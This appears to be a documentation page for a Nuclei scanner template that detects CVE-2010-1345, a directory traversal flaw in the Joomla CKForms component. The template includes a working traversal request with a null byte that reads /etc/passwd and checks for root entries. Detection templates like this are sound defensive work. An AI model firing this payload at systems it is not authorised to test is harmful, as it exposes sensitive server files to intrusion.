Joomla! Component Cookex Agency CKForms - Local File Inclusion
ID: CVE-2010-1345
Severity: medium
Author: daffainfo
Tags: cve2010,cve,lfi,edb,joomla,cookex
Description
Section titled “Description”A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
YAML Source
Section titled “YAML Source”id: CVE-2010-1345
info: name: Joomla! Component Cookex Agency CKForms - Local File Inclusion author: daffainfo severity: medium description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. impact: | The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15453 - https://nvd.nist.gov/vuln/detail/CVE-2010-1345 - http://www.exploit-db.com/exploits/11785 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1345 cwe-id: CWE-22 epss-score: 0.00477 epss-percentile: 0.75244 cpe: cpe:2.3:a:cookex:com_ckforms:1.3.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cookex product: com_ckforms tags: cve2010,cve,lfi,edb,joomla,cookex
http: - method: GET path: - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a0047304502202fd9e56297bcd9ebc95a5041f964915b7f78cc1e48e6c5a1802654de7a330e4e022100cbb914e9d95dd70d657b9079ec65ad4783073d936b43bc16022e746cd62c3f19:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2010/CVE-2010-1345.yaml"